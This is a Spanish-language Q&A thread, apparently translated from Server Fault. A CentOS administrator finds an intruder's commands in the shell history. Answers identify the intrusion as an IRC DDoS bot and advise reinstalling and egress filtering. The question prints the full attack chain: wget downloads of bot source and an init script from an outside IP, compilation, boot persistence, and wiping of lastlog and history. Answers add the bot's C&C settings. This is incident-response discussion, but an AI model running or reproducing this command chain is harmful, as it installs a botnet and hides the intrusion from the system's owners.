Pregunta ¿Está mi servidor web comprometido? [duplicar]


Esta pregunta ya tiene una respuesta aquí:

Iniciamos sesión de forma remota en nuestro servidor CentOS hoy usando Putty, y mientras vagábamos por los comandos anteriores usando la flecha hacia arriba, tropezamos con lo siguiente:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(&& 's reemplazado con nuevas líneas para mayor claridad)

¡Nunca ejecuté estos comandos, NUNCA! ¿Cómo sucedió esto, mi servidor está siendo hackeado? Inmediatamente cambié mi contraseña de root, pero esperaba que alguien pudiera echarle una ojeada a lo que está pasando aquí.

Veo referencias hechas en la fuente a robots ddos, ¡y yo y mi colega estamos seriamente preocupados!

¡Gracias por adelantado!


11
2018-02-10 20:01


origen


Pertenece en ServerFault.com - Oded
Déjame ser el primero en decir: esta es la razón por la que no deberías estar ejecutando como root ... - Aistina
Espero que hayas celebrado el Día de la conciencia de reserva. Celebré el Día de la Concienciación sobre la Restauración esta semana y encontré que faltaba mi implementación automatizada. Que tu recuperación sea más fácil que la mía. - Mnebuerquo
Aquí hay algunas preguntas relacionadas que debe mirar. serverfault.com/questions/6159/aftermath-of-hack  serverfault.com/questions/6190/…  serverfault.com/questions/57962/… - Zoredache
Agradable del hacker para respaldar tu /etc/init.d/network expediente. - ceejayoz


Respuestas:


Sí, has sido hackeado. El pirata informático instaló una puerta trasera de IRC y se está conectando a este servidor de IRC:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

El bot herder puede ejecutar cualquier comando en su servidor. Recomiendo apagar el servidor y reinstalarlo. inmediatamente. El bot tiene algunas características de ataque DDoS, DNS flood, syn flood e ICMP flood. También funciona en las ventanas, que es muy bueno. Hay un módulo de propagación muy antiguo para infectar myDoom. Esto parece un viejo malware.


8
2018-02-10 20:06



Es por esto que siempre debe tener reglas de firewall que bloqueen el tráfico de egreso. Un firewall configurado correctamente habría bloqueado este ataque para que no pueda comunicarse con su comando y controlar el servidor irc. - 3dinfluence
Esto no habría evitado la intrusión inicial, pero habría dificultado que el atacante agregara su servidor a una red de bots. De cualquier manera, te habrías enfrentado con volver a crear imágenes de tu sistema operativo. - 3dinfluence
"Esto parece un malware antiguo". - Menos mal que estaba ejecutando antivirus en su caja de Linux para detectar esto. - ta.speot.is
@taspeotis +1 para el uso eficiente del sarcasmo humorístico ... - Joe Internet
Tengo curiosidad, ¿cómo supiste eso (el servidor enemigo, el puerto, la ONU, PW) de esos comandos? - John


La respuesta es, en cualquier caso, sí, su servidor está siendo o ha sido comprometido.

Debe cortar la conexión de Internet al servidor inmediatamente, hacer una copia de seguridad completa (tenga en cuenta que otros archivos también pueden estar en peligro) y volver a instalar.

Además, es posible que desee notificar a los propietarios de la IP desde la cual se ejecuta la red bot (o lo que sea que sea). Aquí está el RIPE los datos de whois.


6
2018-02-10 20:05





Nunca permita el inicio de sesión de root a través de SSH.


1
2018-02-10 20:06



Podría haber sido cualquier cuenta de usuario que tenga capacidad para sudo. - Joe


La respuesta a tu pregunta es sí


0
2018-02-10 20:03





Parece que has sido infectado con BOT_VERSION dónde BOT_VERSION es

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

¿Su antivirus de Linux no lo detectó?


0
2018-02-10 21:40





Probablemente habría limpiado la dirección IP de la máquina C&C antes de publicar.


0
2018-02-10 21:59



No sé, tenía bastante curiosidad por el código fuente. - ceejayoz